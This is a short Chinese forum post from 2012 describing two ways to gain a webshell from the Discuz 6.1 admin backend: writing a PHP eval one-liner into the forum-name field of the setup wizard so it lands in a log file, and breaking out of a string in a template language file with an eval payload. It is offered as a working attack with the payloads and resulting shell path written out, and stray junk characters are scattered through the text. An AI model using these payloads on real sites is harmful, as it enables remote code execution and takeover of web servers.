discuz6.1两种方法后台拿shell) U+ N8 L! w1 Q1 r1 o) B
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
9 S3 `4 d( \7 H: F8 T1:& u( W8 k- _. _# ?) o4 D
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
2 n* I# x; G4 Y% b3 W& M( Oadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell% Z# M! h, U# R2 }! s( ?5 o! D
<?php eval($_POST[cmd]);?>
& q4 c: |- d$ T& X( W% h* ?6 _后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
/ V( f5 t p6 A1 N
. J7 ~+ Z2 q+ ]' Q- T. _
! B* ~6 ?% \/ X6 P# l3 P% Q2:后台模板管理--默认模板套系--详情
% F+ |8 ]7 M8 `/ ?. etemplates/default/actions.lang.php; Z% z' l1 C e) q0 g* @
jhackj\\');eval($_POST[cmd])?>;//& f4 I7 \/ P. j% l4 f% u
4 o& \& Z, d8 j, H3 B利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对